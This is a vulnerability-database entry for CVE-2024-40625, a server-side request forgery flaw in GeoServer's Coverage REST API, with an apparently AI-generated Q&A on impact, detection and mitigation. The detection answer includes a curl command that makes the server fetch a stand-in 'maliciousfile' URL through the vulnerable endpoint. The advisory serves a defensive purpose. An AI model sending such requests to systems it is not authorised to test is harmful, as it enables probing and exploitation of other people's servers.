CVE-2024-40625
BaseFortify
Publication date: 2025-06-10
Last updated on: 2025-08-26
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| osgeo | geoserver | to 2.26.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2024-40625 is a Server Side Request Forgery (SSRF) vulnerability in GeoServer's Coverage REST API endpoint `/workspaces/{workspaceName}/coveragestores/{storeName}/{method}.{format}` when `{method}` is set to 'url'. It allows an attacker with high privileges to upload files by specifying a URL without proper validation, causing the server to send requests to arbitrary URLs. This can expose internal resources or sensitive data. The vulnerability is due to missing URL validation in the source code and is fixed in GeoServer version 2.26.0. [1]
How can this vulnerability impact me? :
This vulnerability can allow an attacker with high privileges to perform SSRF attacks, making the server send requests to arbitrary URLs. This can lead to exposure of internal resources or sensitive data, potentially compromising confidentiality. The impact includes high confidentiality loss and low availability impact, but no integrity impact. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring requests to the GeoServer Coverage REST API endpoint `/workspaces/{workspaceName}/coveragestores/{storeName}/url.{format}` for unusual or unauthorized file upload attempts using URLs. Since the vulnerability involves Server Side Request Forgery (SSRF) via the 'url' method, you can look for HTTP POST or PUT requests to this endpoint with payloads specifying external URLs. Network monitoring tools or web server logs can be used to identify such requests. Specific commands depend on your environment, but for example, using curl to test the endpoint: `curl -X POST -d '{"url":"http://example.com/maliciousfile"}' https://your-geoserver-domain/workspaces/yourworkspace/coveragestores/yourstore/url.json` can help verify if the server accepts URL uploads without validation. Additionally, inspecting GeoServer logs for unexpected outbound requests triggered by these uploads can help detect exploitation attempts. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade GeoServer to version 2.26.0 or later, where this vulnerability is fixed. Until the upgrade can be performed, restrict access to the Coverage REST API endpoint `/workspaces/{workspaceName}/coveragestores/{storeName}/url.{format}` to only trusted, high-privilege users, as the vulnerability requires high privileges to exploit. Additionally, monitor and block suspicious requests attempting to upload files via URLs and consider implementing network-level controls to prevent the server from making unauthorized outbound requests. Applying strict firewall rules and disabling or limiting the URL upload functionality if possible can also reduce risk. [1]